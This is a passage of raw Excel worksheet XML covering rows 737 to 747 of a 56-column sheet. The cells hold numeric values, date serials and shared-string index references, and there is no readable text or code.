      <c r="AD737">
        <v>0</v>
      </c>
      <c r="AE737">
        <v>0</v>
      </c>
      <c r="AF737" t="s">
        <v>5771</v>
      </c>
      <c r="AG737">
        <v>61256</v>
      </c>
      <c r="AH737">
        <v>16</v>
      </c>
      <c r="AJ737">
        <v>242</v>
      </c>
      <c r="AK737" t="s">
        <v>758</v>
      </c>
      <c r="AL737" t="s">
        <v>759</v>
      </c>
      <c r="AM737" t="s">
        <v>5772</v>
      </c>
      <c r="AN737" t="s">
        <v>55</v>
      </c>
      <c r="AO737">
        <v>2006</v>
      </c>
      <c r="AP737">
        <v>318480518</v>
      </c>
      <c r="AQ737" t="s">
        <v>5773</v>
      </c>
      <c r="AR737" t="s">
        <v>5774</v>
      </c>
      <c r="AS737" t="s">
        <v>71</v>
      </c>
      <c r="AT737" t="s">
        <v>58</v>
      </c>
      <c r="AU737">
        <v>24</v>
      </c>
      <c r="AV737">
        <v>1</v>
      </c>
      <c r="AW737">
        <v>40</v>
      </c>
      <c r="AX737">
        <v>25</v>
      </c>
      <c r="AY737">
        <v>12</v>
      </c>
      <c r="AZ737">
        <v>5</v>
      </c>
      <c r="BA737" t="s">
        <v>17289</v>
      </c>
      <c r="BB737" t="s">
        <v>15906</v>
      </c>
      <c r="BC737">
        <v>0</v>
      </c>
      <c r="BD737" t="s">
        <v>10561</v>
      </c>
    </row>
    <row r="738" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A738">
        <v>2241</v>
      </c>
      <c r="B738" t="s">
        <v>5775</v>
      </c>
      <c r="C738" t="s">
        <v>157</v>
      </c>
      <c r="D738" t="s">
        <v>5776</v>
      </c>
      <c r="E738" t="s">
        <v>142</v>
      </c>
      <c r="F738" t="s">
        <v>5777</v>
      </c>
      <c r="G738" s="1">
        <v>43907</v>
      </c>
      <c r="H738">
        <v>2512</v>
      </c>
      <c r="I738">
        <v>2512</v>
      </c>
      <c r="J738">
        <v>0</v>
      </c>
      <c r="K738">
        <v>3</v>
      </c>
      <c r="L738">
        <v>3</v>
      </c>
      <c r="M738">
        <v>0</v>
      </c>
      <c r="N738">
        <v>0</v>
      </c>
      <c r="O738">
        <v>0</v>
      </c>
      <c r="P738">
        <v>0</v>
      </c>
      <c r="Q738">
        <v>18</v>
      </c>
      <c r="R738">
        <v>18</v>
      </c>
      <c r="S738">
        <v>0</v>
      </c>
      <c r="T738">
        <v>1</v>
      </c>
      <c r="U738">
        <v>0</v>
      </c>
      <c r="V738">
        <v>150000</v>
      </c>
      <c r="W738">
        <v>15000</v>
      </c>
      <c r="X738">
        <v>0</v>
      </c>
      <c r="Y738">
        <v>0</v>
      </c>
      <c r="Z738">
        <v>0</v>
      </c>
      <c r="AA738">
        <v>0</v>
      </c>
      <c r="AB738">
        <v>50</v>
      </c>
      <c r="AC738">
        <v>300</v>
      </c>
      <c r="AD738">
        <v>0</v>
      </c>
      <c r="AE738">
        <v>5000</v>
      </c>
      <c r="AF738" t="s">
        <v>5778</v>
      </c>
      <c r="AG738">
        <v>67156</v>
      </c>
      <c r="AH738">
        <v>16</v>
      </c>
      <c r="AJ738">
        <v>241</v>
      </c>
      <c r="AK738" t="s">
        <v>947</v>
      </c>
      <c r="AL738" t="s">
        <v>5779</v>
      </c>
      <c r="AM738" t="s">
        <v>5780</v>
      </c>
      <c r="AN738" t="s">
        <v>55</v>
      </c>
      <c r="AO738">
        <v>2002</v>
      </c>
      <c r="AP738" t="s">
        <v>5781</v>
      </c>
      <c r="AQ738" t="s">
        <v>5782</v>
      </c>
      <c r="AR738" t="s">
        <v>5783</v>
      </c>
      <c r="AS738" t="s">
        <v>71</v>
      </c>
      <c r="AT738" t="s">
        <v>58</v>
      </c>
      <c r="AU738">
        <v>0</v>
      </c>
      <c r="AV738">
        <v>0</v>
      </c>
      <c r="AW738">
        <v>20</v>
      </c>
      <c r="AX738">
        <v>130</v>
      </c>
      <c r="AY738">
        <v>20</v>
      </c>
      <c r="AZ738">
        <v>25</v>
      </c>
      <c r="BA738" t="s">
        <v>16737</v>
      </c>
      <c r="BB738" t="s">
        <v>15782</v>
      </c>
      <c r="BC738" t="s">
        <v>9536</v>
      </c>
      <c r="BD738" t="s">
        <v>9787</v>
      </c>
    </row>
    <row r="739" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A739">
        <v>2687</v>
      </c>
      <c r="B739" t="s">
        <v>2677</v>
      </c>
      <c r="C739" t="s">
        <v>318</v>
      </c>
      <c r="D739" t="s">
        <v>5784</v>
      </c>
      <c r="E739" t="s">
        <v>49</v>
      </c>
      <c r="F739" t="s">
        <v>364</v>
      </c>
      <c r="G739" s="1">
        <v>43895</v>
      </c>
      <c r="H739">
        <v>2554</v>
      </c>
      <c r="I739">
        <v>2554</v>
      </c>
      <c r="J739">
        <v>0</v>
      </c>
      <c r="K739">
        <v>0</v>
      </c>
      <c r="L739">
        <v>0</v>
      </c>
      <c r="M739">
        <v>0</v>
      </c>
      <c r="N739">
        <v>0</v>
      </c>
      <c r="O739">
        <v>0</v>
      </c>
      <c r="P739">
        <v>0</v>
      </c>
      <c r="Q739">
        <v>0</v>
      </c>
      <c r="R739">
        <v>0</v>
      </c>
      <c r="S739">
        <v>0</v>
      </c>
      <c r="T739">
        <v>1</v>
      </c>
      <c r="U739">
        <v>0</v>
      </c>
      <c r="V739">
        <v>0</v>
      </c>
      <c r="W739">
        <v>0</v>
      </c>
      <c r="X739">
        <v>0</v>
      </c>
      <c r="Y739">
        <v>0</v>
      </c>
      <c r="Z739">
        <v>0</v>
      </c>
      <c r="AA739">
        <v>0</v>
      </c>
      <c r="AB739">
        <v>0</v>
      </c>
      <c r="AC739">
        <v>0</v>
      </c>
      <c r="AD739">
        <v>0</v>
      </c>
      <c r="AE739">
        <v>200000</v>
      </c>
      <c r="AF739" t="s">
        <v>2679</v>
      </c>
      <c r="AG739">
        <v>90245</v>
      </c>
      <c r="AH739">
        <v>26</v>
      </c>
      <c r="AJ739">
        <v>420</v>
      </c>
      <c r="AK739" t="s">
        <v>936</v>
      </c>
      <c r="AL739" t="s">
        <v>937</v>
      </c>
      <c r="AM739" t="s">
        <v>5785</v>
      </c>
      <c r="AN739" t="s">
        <v>55</v>
      </c>
      <c r="AO739">
        <v>2018</v>
      </c>
      <c r="AP739">
        <v>8114115125</v>
      </c>
      <c r="AQ739" t="s">
        <v>5786</v>
      </c>
      <c r="AR739" t="s">
        <v>2679</v>
      </c>
      <c r="AS739" t="s">
        <v>371</v>
      </c>
      <c r="AT739" t="s">
        <v>58</v>
      </c>
      <c r="AU739">
        <v>25</v>
      </c>
      <c r="AV739">
        <v>1</v>
      </c>
      <c r="AW739">
        <v>2</v>
      </c>
      <c r="AX739">
        <v>3</v>
      </c>
      <c r="AY739">
        <v>2</v>
      </c>
      <c r="AZ739">
        <v>0</v>
      </c>
      <c r="BA739" t="s">
        <v>16899</v>
      </c>
      <c r="BB739">
        <v>0</v>
      </c>
      <c r="BC739" t="s">
        <v>9536</v>
      </c>
      <c r="BD739" t="s">
        <v>10595</v>
      </c>
    </row>
    <row r="740" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A740">
        <v>2647</v>
      </c>
      <c r="B740" t="s">
        <v>5787</v>
      </c>
      <c r="C740" t="s">
        <v>157</v>
      </c>
      <c r="D740" t="s">
        <v>5788</v>
      </c>
      <c r="E740" t="s">
        <v>809</v>
      </c>
      <c r="F740" t="s">
        <v>5789</v>
      </c>
      <c r="G740" s="1">
        <v>43935</v>
      </c>
      <c r="H740">
        <v>2598</v>
      </c>
      <c r="I740">
        <v>2598</v>
      </c>
      <c r="J740">
        <v>3</v>
      </c>
      <c r="K740">
        <v>0</v>
      </c>
      <c r="L740">
        <v>0</v>
      </c>
      <c r="M740">
        <v>0</v>
      </c>
      <c r="N740">
        <v>0</v>
      </c>
      <c r="O740">
        <v>0</v>
      </c>
      <c r="P740">
        <v>0</v>
      </c>
      <c r="Q740">
        <v>5</v>
      </c>
      <c r="R740">
        <v>2</v>
      </c>
      <c r="S740">
        <v>0</v>
      </c>
      <c r="T740">
        <v>1</v>
      </c>
      <c r="U740">
        <v>300</v>
      </c>
      <c r="V740">
        <v>0</v>
      </c>
      <c r="W740">
        <v>0</v>
      </c>
      <c r="X740">
        <v>0</v>
      </c>
      <c r="Y740">
        <v>0</v>
      </c>
      <c r="Z740">
        <v>0</v>
      </c>
      <c r="AA740">
        <v>0</v>
      </c>
      <c r="AB740">
        <v>200</v>
      </c>
      <c r="AC740">
        <v>200</v>
      </c>
      <c r="AD740">
        <v>0</v>
      </c>
      <c r="AE740">
        <v>2000</v>
      </c>
      <c r="AF740" t="s">
        <v>5790</v>
      </c>
      <c r="AG740">
        <v>60116</v>
      </c>
      <c r="AH740">
        <v>16</v>
      </c>
      <c r="AJ740">
        <v>264</v>
      </c>
      <c r="AK740" t="s">
        <v>5791</v>
      </c>
      <c r="AL740" t="s">
        <v>5792</v>
      </c>
      <c r="AM740" t="s">
        <v>5793</v>
      </c>
      <c r="AN740" t="s">
        <v>55</v>
      </c>
      <c r="AO740">
        <v>2018</v>
      </c>
      <c r="AP740">
        <v>811334960</v>
      </c>
      <c r="AQ740" t="s">
        <v>5794</v>
      </c>
      <c r="AR740" t="s">
        <v>5790</v>
      </c>
      <c r="AS740" t="s">
        <v>71</v>
      </c>
      <c r="AT740" t="s">
        <v>58</v>
      </c>
      <c r="AU740">
        <v>6</v>
      </c>
      <c r="AV740">
        <v>1</v>
      </c>
      <c r="AW740">
        <v>2</v>
      </c>
      <c r="AX740">
        <v>0</v>
      </c>
      <c r="AY740">
        <v>4</v>
      </c>
      <c r="AZ740">
        <v>1</v>
      </c>
      <c r="BA740" t="s">
        <v>17237</v>
      </c>
      <c r="BB740">
        <v>0</v>
      </c>
      <c r="BC740" t="s">
        <v>9985</v>
      </c>
      <c r="BD740" t="s">
        <v>10512</v>
      </c>
    </row>
    <row r="741" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A741">
        <v>2581</v>
      </c>
      <c r="B741" t="s">
        <v>5795</v>
      </c>
      <c r="C741" t="s">
        <v>47</v>
      </c>
      <c r="D741" t="s">
        <v>5796</v>
      </c>
      <c r="E741" t="s">
        <v>111</v>
      </c>
      <c r="F741" t="s">
        <v>2984</v>
      </c>
      <c r="G741" s="1">
        <v>44218</v>
      </c>
      <c r="H741">
        <v>2605</v>
      </c>
      <c r="I741">
        <v>2605</v>
      </c>
      <c r="J741">
        <v>1</v>
      </c>
      <c r="K741">
        <v>1</v>
      </c>
      <c r="L741">
        <v>0</v>
      </c>
      <c r="M741">
        <v>2</v>
      </c>
      <c r="N741">
        <v>0</v>
      </c>
      <c r="O741">
        <v>0</v>
      </c>
      <c r="P741">
        <v>0</v>
      </c>
      <c r="Q741">
        <v>5</v>
      </c>
      <c r="R741">
        <v>2</v>
      </c>
      <c r="S741">
        <v>0</v>
      </c>
      <c r="T741">
        <v>1</v>
      </c>
      <c r="U741">
        <v>300000</v>
      </c>
      <c r="V741">
        <v>300000</v>
      </c>
      <c r="W741">
        <v>0</v>
      </c>
      <c r="X741">
        <v>3000</v>
      </c>
      <c r="Y741">
        <v>0</v>
      </c>
      <c r="Z741">
        <v>0</v>
      </c>
      <c r="AA741">
        <v>0</v>
      </c>
      <c r="AB741">
        <v>100</v>
      </c>
      <c r="AC741">
        <v>200</v>
      </c>
      <c r="AD741">
        <v>0</v>
      </c>
      <c r="AE741">
        <v>5000</v>
      </c>
      <c r="AF741" t="s">
        <v>5797</v>
      </c>
      <c r="AG741">
        <v>20414</v>
      </c>
      <c r="AH741">
        <v>2</v>
      </c>
      <c r="AJ741">
        <v>53</v>
      </c>
      <c r="AK741" t="s">
        <v>2220</v>
      </c>
      <c r="AL741" t="s">
        <v>2221</v>
      </c>
      <c r="AM741" t="s">
        <v>5798</v>
      </c>
      <c r="AN741" t="s">
        <v>55</v>
      </c>
      <c r="AO741">
        <v>2011</v>
      </c>
      <c r="AP741" t="s">
        <v>5799</v>
      </c>
      <c r="AQ741" t="s">
        <v>5800</v>
      </c>
      <c r="AR741" t="s">
        <v>5797</v>
      </c>
      <c r="AS741" t="s">
        <v>71</v>
      </c>
      <c r="AT741" t="s">
        <v>58</v>
      </c>
      <c r="AU741">
        <v>30</v>
      </c>
      <c r="AV741">
        <v>0</v>
      </c>
      <c r="AW741">
        <v>10</v>
      </c>
      <c r="AX741">
        <v>5</v>
      </c>
      <c r="AY741">
        <v>2</v>
      </c>
      <c r="AZ741">
        <v>4</v>
      </c>
      <c r="BA741" t="s">
        <v>17190</v>
      </c>
      <c r="BB741" t="s">
        <v>15892</v>
      </c>
      <c r="BC741" t="s">
        <v>9603</v>
      </c>
      <c r="BD741" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="742" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A742">
        <v>2082</v>
      </c>
      <c r="B742" t="s">
        <v>5801</v>
      </c>
      <c r="C742" t="s">
        <v>168</v>
      </c>
      <c r="D742" t="s">
        <v>5802</v>
      </c>
      <c r="E742" t="s">
        <v>300</v>
      </c>
      <c r="F742" t="s">
        <v>5803</v>
      </c>
      <c r="G742" s="1">
        <v>44123</v>
      </c>
      <c r="H742">
        <v>2620</v>
      </c>
      <c r="I742">
        <v>2620</v>
      </c>
      <c r="J742">
        <v>1</v>
      </c>
      <c r="K742">
        <v>0</v>
      </c>
      <c r="L742">
        <v>0</v>
      </c>
      <c r="M742">
        <v>2</v>
      </c>
      <c r="N742">
        <v>0</v>
      </c>
      <c r="O742">
        <v>0</v>
      </c>
      <c r="P742">
        <v>0</v>
      </c>
      <c r="Q742">
        <v>4</v>
      </c>
      <c r="R742">
        <v>3</v>
      </c>
      <c r="S742">
        <v>0</v>
      </c>
      <c r="T742">
        <v>1</v>
      </c>
      <c r="U742">
        <v>70000</v>
      </c>
      <c r="V742">
        <v>0</v>
      </c>
      <c r="W742">
        <v>0</v>
      </c>
      <c r="X742">
        <v>1900</v>
      </c>
      <c r="Y742">
        <v>0</v>
      </c>
      <c r="Z742">
        <v>0</v>
      </c>
      <c r="AA742">
        <v>0</v>
      </c>
      <c r="AB742">
        <v>100</v>
      </c>
      <c r="AC742">
        <v>500</v>
      </c>
      <c r="AD742">
        <v>0</v>
      </c>
      <c r="AE742">
        <v>50000</v>
      </c>
      <c r="AF742" t="s">
        <v>1845</v>
      </c>
      <c r="AG742">
        <v>17211</v>
      </c>
      <c r="AH742">
        <v>13</v>
      </c>
      <c r="AJ742">
        <v>176</v>
      </c>
      <c r="AK742" t="s">
        <v>5804</v>
      </c>
      <c r="AL742" t="s">
        <v>5805</v>
      </c>
      <c r="AM742" t="s">
        <v>5806</v>
      </c>
      <c r="AN742" t="s">
        <v>55</v>
      </c>
      <c r="AO742">
        <v>2019</v>
      </c>
      <c r="AP742" t="s">
        <v>5807</v>
      </c>
      <c r="AQ742" t="s">
        <v>5808</v>
      </c>
      <c r="AR742" t="s">
        <v>5809</v>
      </c>
      <c r="AS742" t="s">
        <v>179</v>
      </c>
      <c r="AT742" t="s">
        <v>58</v>
      </c>
      <c r="AU742">
        <v>6</v>
      </c>
      <c r="AV742">
        <v>1</v>
      </c>
      <c r="AW742">
        <v>3</v>
      </c>
      <c r="AX742">
        <v>0</v>
      </c>
      <c r="AY742">
        <v>2</v>
      </c>
      <c r="AZ742">
        <v>5</v>
      </c>
      <c r="BA742" t="s">
        <v>17059</v>
      </c>
      <c r="BB742" t="s">
        <v>15687</v>
      </c>
      <c r="BC742" t="s">
        <v>10029</v>
      </c>
      <c r="BD742" t="s">
        <v>10738</v>
      </c>
    </row>
    <row r="743" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A743">
        <v>2700</v>
      </c>
      <c r="B743" t="s">
        <v>5810</v>
      </c>
      <c r="C743" t="s">
        <v>2760</v>
      </c>
      <c r="D743" t="s">
        <v>5811</v>
      </c>
      <c r="E743" t="s">
        <v>76</v>
      </c>
      <c r="F743" t="s">
        <v>5812</v>
      </c>
      <c r="G743" s="1">
        <v>43930</v>
      </c>
      <c r="H743">
        <v>2652</v>
      </c>
      <c r="I743">
        <v>2652</v>
      </c>
      <c r="J743">
        <v>0</v>
      </c>
      <c r="K743">
        <v>0</v>
      </c>
      <c r="L743">
        <v>0</v>
      </c>
      <c r="M743">
        <v>0</v>
      </c>
      <c r="N743">
        <v>0</v>
      </c>
      <c r="O743">
        <v>0</v>
      </c>
      <c r="P743">
        <v>0</v>
      </c>
      <c r="Q743">
        <v>0</v>
      </c>
      <c r="R743">
        <v>16</v>
      </c>
      <c r="S743">
        <v>0</v>
      </c>
      <c r="T743">
        <v>0</v>
      </c>
      <c r="U743">
        <v>0</v>
      </c>
      <c r="V743">
        <v>0</v>
      </c>
      <c r="W743">
        <v>0</v>
      </c>
      <c r="X743">
        <v>0</v>
      </c>
      <c r="Y743">
        <v>0</v>
      </c>
      <c r="Z743">
        <v>0</v>
      </c>
      <c r="AA743">
        <v>0</v>
      </c>
      <c r="AB743">
        <v>0</v>
      </c>
      <c r="AC743">
        <v>20</v>
      </c>
      <c r="AD743">
        <v>0</v>
      </c>
      <c r="AE743">
        <v>0</v>
      </c>
      <c r="AF743" t="s">
        <v>5813</v>
      </c>
      <c r="AG743">
        <v>83672</v>
      </c>
      <c r="AH743">
        <v>18</v>
      </c>
      <c r="AJ743">
        <v>285</v>
      </c>
      <c r="AK743" t="s">
        <v>5814</v>
      </c>
      <c r="AL743" t="s">
        <v>5815</v>
      </c>
      <c r="AM743" t="s">
        <v>5816</v>
      </c>
      <c r="AN743" t="s">
        <v>55</v>
      </c>
      <c r="AO743">
        <v>2020</v>
      </c>
      <c r="AP743">
        <v>85205005758</v>
      </c>
      <c r="AQ743" t="s">
        <v>5817</v>
      </c>
      <c r="AR743" t="s">
        <v>5813</v>
      </c>
      <c r="AS743" t="s">
        <v>57</v>
      </c>
      <c r="AT743" t="s">
        <v>58</v>
      </c>
      <c r="AU743">
        <v>30</v>
      </c>
      <c r="AV743">
        <v>0</v>
      </c>
      <c r="AW743">
        <v>0</v>
      </c>
      <c r="AX743">
        <v>0</v>
      </c>
      <c r="AY743">
        <v>7</v>
      </c>
      <c r="AZ743">
        <v>1</v>
      </c>
      <c r="BA743" t="s">
        <v>17276</v>
      </c>
      <c r="BB743">
        <v>0</v>
      </c>
      <c r="BC743" t="s">
        <v>10762</v>
      </c>
      <c r="BD743" t="s">
        <v>10763</v>
      </c>
    </row>
    <row r="744" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A744">
        <v>2613</v>
      </c>
      <c r="B744" t="s">
        <v>5818</v>
      </c>
      <c r="C744" t="s">
        <v>129</v>
      </c>
      <c r="D744" t="s">
        <v>5819</v>
      </c>
      <c r="E744" t="s">
        <v>49</v>
      </c>
      <c r="F744" t="s">
        <v>5820</v>
      </c>
      <c r="G744" s="1">
        <v>43959</v>
      </c>
      <c r="H744">
        <v>2667</v>
      </c>
      <c r="I744">
        <v>2667</v>
      </c>
      <c r="J744">
        <v>0</v>
      </c>
      <c r="K744">
        <v>1</v>
      </c>
      <c r="L744">
        <v>1</v>
      </c>
      <c r="M744">
        <v>0</v>
      </c>
      <c r="N744">
        <v>0</v>
      </c>
      <c r="O744">
        <v>0</v>
      </c>
      <c r="P744">
        <v>0</v>
      </c>
      <c r="Q744">
        <v>0</v>
      </c>
      <c r="R744">
        <v>0</v>
      </c>
      <c r="S744">
        <v>0</v>
      </c>
      <c r="T744">
        <v>1</v>
      </c>
      <c r="U744">
        <v>0</v>
      </c>
      <c r="V744">
        <v>12000</v>
      </c>
      <c r="W744">
        <v>12000</v>
      </c>
      <c r="X744">
        <v>0</v>
      </c>
      <c r="Y744">
        <v>0</v>
      </c>
      <c r="Z744">
        <v>0</v>
      </c>
      <c r="AA744">
        <v>0</v>
      </c>
      <c r="AB744">
        <v>0</v>
      </c>
      <c r="AC744">
        <v>0</v>
      </c>
      <c r="AD744">
        <v>0</v>
      </c>
      <c r="AE744">
        <v>20000</v>
      </c>
      <c r="AF744" t="s">
        <v>5821</v>
      </c>
      <c r="AG744">
        <v>15720</v>
      </c>
      <c r="AH744">
        <v>11</v>
      </c>
      <c r="AJ744">
        <v>268</v>
      </c>
      <c r="AK744" t="s">
        <v>4981</v>
      </c>
      <c r="AL744" t="s">
        <v>5822</v>
      </c>
      <c r="AM744" t="s">
        <v>5823</v>
      </c>
      <c r="AN744" t="s">
        <v>55</v>
      </c>
      <c r="AO744">
        <v>2016</v>
      </c>
      <c r="AP744">
        <v>85210748597</v>
      </c>
      <c r="AQ744" t="s">
        <v>5824</v>
      </c>
      <c r="AR744" t="s">
        <v>5825</v>
      </c>
      <c r="AS744" t="s">
        <v>71</v>
      </c>
      <c r="AT744" t="s">
        <v>58</v>
      </c>
      <c r="AU744">
        <v>5</v>
      </c>
      <c r="AV744">
        <v>1</v>
      </c>
      <c r="AW744">
        <v>8</v>
      </c>
      <c r="AX744">
        <v>14</v>
      </c>
      <c r="AY744">
        <v>3</v>
      </c>
      <c r="AZ744">
        <v>0</v>
      </c>
      <c r="BA744" t="s">
        <v>17198</v>
      </c>
      <c r="BB744" t="s">
        <v>17278</v>
      </c>
      <c r="BC744" t="s">
        <v>10633</v>
      </c>
      <c r="BD744" t="s">
        <v>10634</v>
      </c>
    </row>
    <row r="745" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A745">
        <v>1973</v>
      </c>
      <c r="B745" t="s">
        <v>5826</v>
      </c>
      <c r="C745" t="s">
        <v>157</v>
      </c>
      <c r="D745" t="s">
        <v>5827</v>
      </c>
      <c r="E745" t="s">
        <v>412</v>
      </c>
      <c r="F745" t="s">
        <v>5828</v>
      </c>
      <c r="G745" s="1">
        <v>44067</v>
      </c>
      <c r="H745">
        <v>2724</v>
      </c>
      <c r="I745">
        <v>2724</v>
      </c>
      <c r="J745">
        <v>6</v>
      </c>
      <c r="K745">
        <v>1</v>
      </c>
      <c r="L745">
        <v>3</v>
      </c>
      <c r="M745">
        <v>0</v>
      </c>
      <c r="N745">
        <v>0</v>
      </c>
      <c r="O745">
        <v>0</v>
      </c>
      <c r="P745">
        <v>0</v>
      </c>
      <c r="Q745">
        <v>2</v>
      </c>
      <c r="R745">
        <v>2</v>
      </c>
      <c r="S745">
        <v>1</v>
      </c>
      <c r="T745">
        <v>1</v>
      </c>
      <c r="U745">
        <v>2500000</v>
      </c>
      <c r="V745">
        <v>1000</v>
      </c>
      <c r="W745">
        <v>10000</v>
      </c>
      <c r="X745">
        <v>0</v>
      </c>
      <c r="Y745">
        <v>0</v>
      </c>
      <c r="Z745">
        <v>0</v>
      </c>
      <c r="AA745">
        <v>0</v>
      </c>
      <c r="AB745">
        <v>3000</v>
      </c>
      <c r="AC745">
        <v>3000</v>
      </c>
      <c r="AD745">
        <v>1</v>
      </c>
      <c r="AE745">
        <v>20</v>
      </c>
      <c r="AF745" t="s">
        <v>5829</v>
      </c>
      <c r="AG745">
        <v>67217</v>
      </c>
      <c r="AH745">
        <v>16</v>
      </c>
      <c r="AJ745">
        <v>260</v>
      </c>
      <c r="AK745" t="s">
        <v>425</v>
      </c>
      <c r="AL745" t="s">
        <v>2687</v>
      </c>
      <c r="AM745" t="s">
        <v>5830</v>
      </c>
      <c r="AN745" t="s">
        <v>82</v>
      </c>
      <c r="AO745">
        <v>2002</v>
      </c>
      <c r="AP745" t="s">
        <v>5831</v>
      </c>
      <c r="AQ745" t="s">
        <v>5832</v>
      </c>
      <c r="AR745" t="s">
        <v>5833</v>
      </c>
      <c r="AS745" t="s">
        <v>71</v>
      </c>
      <c r="AT745" t="s">
        <v>86</v>
      </c>
      <c r="AU745">
        <v>26</v>
      </c>
      <c r="AV745">
        <v>1</v>
      </c>
      <c r="AW745">
        <v>0</v>
      </c>
      <c r="AX745">
        <v>0</v>
      </c>
      <c r="AY745">
        <v>29</v>
      </c>
      <c r="AZ745">
        <v>3</v>
      </c>
      <c r="BA745" t="s">
        <v>17036</v>
      </c>
      <c r="BB745" t="s">
        <v>14699</v>
      </c>
      <c r="BC745" t="s">
        <v>10799</v>
      </c>
      <c r="BD745" t="s">
        <v>10798</v>
      </c>
    </row>
    <row r="746" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A746">
        <v>2205</v>
      </c>
      <c r="B746" t="s">
        <v>5834</v>
      </c>
      <c r="C746" t="s">
        <v>74</v>
      </c>
      <c r="D746" t="s">
        <v>5835</v>
      </c>
      <c r="E746" t="s">
        <v>5836</v>
      </c>
      <c r="F746" t="s">
        <v>5837</v>
      </c>
      <c r="G746" s="1">
        <v>44070</v>
      </c>
      <c r="H746">
        <v>2755</v>
      </c>
      <c r="I746">
        <v>2755</v>
      </c>
      <c r="J746">
        <v>0</v>
      </c>
      <c r="K746">
        <v>0</v>
      </c>
      <c r="L746">
        <v>0</v>
      </c>
      <c r="M746">
        <v>0</v>
      </c>
      <c r="N746">
        <v>0</v>
      </c>
      <c r="O746">
        <v>0</v>
      </c>
      <c r="P746">
        <v>0</v>
      </c>
      <c r="Q746">
        <v>0</v>
      </c>
      <c r="R746">
        <v>0</v>
      </c>
      <c r="S746">
        <v>1</v>
      </c>
      <c r="T746">
        <v>0</v>
      </c>
      <c r="U746">
        <v>0</v>
      </c>
      <c r="V746">
        <v>0</v>
      </c>
      <c r="W746">
        <v>0</v>
      </c>
      <c r="X746">
        <v>0</v>
      </c>
      <c r="Y746">
        <v>0</v>
      </c>
      <c r="Z746">
        <v>0</v>
      </c>
      <c r="AA746">
        <v>0</v>
      </c>
      <c r="AB746">
        <v>0</v>
      </c>
      <c r="AC746">
        <v>0</v>
      </c>
      <c r="AD746">
        <v>1</v>
      </c>
      <c r="AE746">
        <v>0</v>
      </c>
      <c r="AF746" t="s">
        <v>5838</v>
      </c>
      <c r="AG746">
        <v>52181</v>
      </c>
      <c r="AH746">
        <v>14</v>
      </c>
      <c r="AJ746">
        <v>215</v>
      </c>
      <c r="AK746" t="s">
        <v>5839</v>
      </c>
      <c r="AL746" t="s">
        <v>5840</v>
      </c>
      <c r="AM746" t="s">
        <v>5841</v>
      </c>
      <c r="AN746" t="s">
        <v>68</v>
      </c>
      <c r="AO746">
        <v>2013</v>
      </c>
      <c r="AP746">
        <v>85225723695</v>
      </c>
      <c r="AQ746" t="s">
        <v>5842</v>
      </c>
      <c r="AR746" t="s">
        <v>5838</v>
      </c>
      <c r="AS746" t="s">
        <v>71</v>
      </c>
      <c r="AT746" t="s">
        <v>72</v>
      </c>
      <c r="AU746">
        <v>30</v>
      </c>
      <c r="AV746">
        <v>0</v>
      </c>
      <c r="AW746">
        <v>0</v>
      </c>
      <c r="AX746">
        <v>1</v>
      </c>
      <c r="AY746">
        <v>1</v>
      </c>
      <c r="AZ746">
        <v>1</v>
      </c>
      <c r="BA746" t="s">
        <v>17086</v>
      </c>
      <c r="BB746" t="s">
        <v>15763</v>
      </c>
      <c r="BC746" t="s">
        <v>11352</v>
      </c>
      <c r="BD746" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="747" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A747">
        <v>2690</v>
      </c>
      <c r="B747" t="s">
        <v>5843</v>
      </c>
      <c r="C747" t="s">
        <v>88</v>
      </c>
      <c r="D747" t="s">
        <v>5844</v>
      </c>
      <c r="E747" t="s">
        <v>49</v>
      </c>
      <c r="F747" t="s">
        <v>512</v>
      </c>
      <c r="G747" s="1">
        <v>43917</v>
      </c>
      <c r="H747">
        <v>2770</v>
      </c>
      <c r="I747">
        <v>2770</v>
      </c>
      <c r="J747">
        <v>0</v>
      </c>
      <c r="K747">
        <v>1</v>
      </c>
      <c r="L747">
        <v>0</v>
      </c>
      <c r="M747">
        <v>0</v>
      </c>
      <c r="N747">
        <v>0</v>
      </c>
      <c r="O747">
        <v>0</v>
      </c>
      <c r="P747">
        <v>0</v>
      </c>
      <c r="Q747">
        <v>0</v>
      </c>
      <c r="R747">
        <v>17</v>
      </c>
      <c r="S747">
        <v>0</v>
      </c>
      <c r="T747">
        <v>0</v>
      </c>
      <c r="U747">
        <v>0</v>
      </c>
      <c r="V747">
        <v>4500</v>
      </c>
      <c r="W747">
        <v>0</v>
      </c>
      <c r="X747">
        <v>0</v>
      </c>
      <c r="Y747">
        <v>0</v>
      </c>
      <c r="Z747">
        <v>0</v>
      </c>
      <c r="AA747">
        <v>0</v>
      </c>
      <c r="AB747">
        <v>0</v>
      </c>
      <c r="AC747">
        <v>4500</v>
      </c>
      <c r="AD747">
        <v>0</v>
      </c>
      <c r="AE747">
        <v>0</v>
      </c>
      <c r="AF747" t="s">
        <v>5845</v>
      </c>
      <c r="AG747">
        <v>80222</v>
      </c>
      <c r="AH747">
        <v>17</v>
      </c>
      <c r="AJ747">
        <v>282</v>
      </c>
      <c r="AK747" t="s">
        <v>592</v>
      </c>
      <c r="AL747" t="s">
        <v>602</v>
      </c>
      <c r="AM747" t="s">
        <v>5846</v>
      </c>
      <c r="AN747" t="s">
        <v>55</v>
      </c>
      <c r="AO747">
        <v>2015</v>
      </c>
      <c r="AP747">
        <v>361721289</v>
      </c>
      <c r="AQ747" t="s">
        <v>5847</v>
      </c>
      <c r="AR747" t="s">
        <v>5845</v>
      </c>
      <c r="AS747" t="s">
        <v>57</v>
      </c>
      <c r="AT747" t="s">
        <v>58</v>
      </c>
      <c r="AU747">
        <v>7</v>
      </c>
      <c r="AV747">
        <v>1</v>
      </c>
      <c r="AW747">
        <v>0</v>
      </c>
      <c r="AX747">
        <v>0</v>
      </c>
      <c r="AY747">
        <v>12</v>
      </c>
      <c r="AZ747">
        <v>1</v>
      </c>
      <c r="BA747" t="s">
        <v>17269</v>
      </c>
      <c r="BB747">
        <v>0</v>
      </c>
      <c r="BC747">
        <v>0</v>
      </c>
      <c r="BD747" t="s">
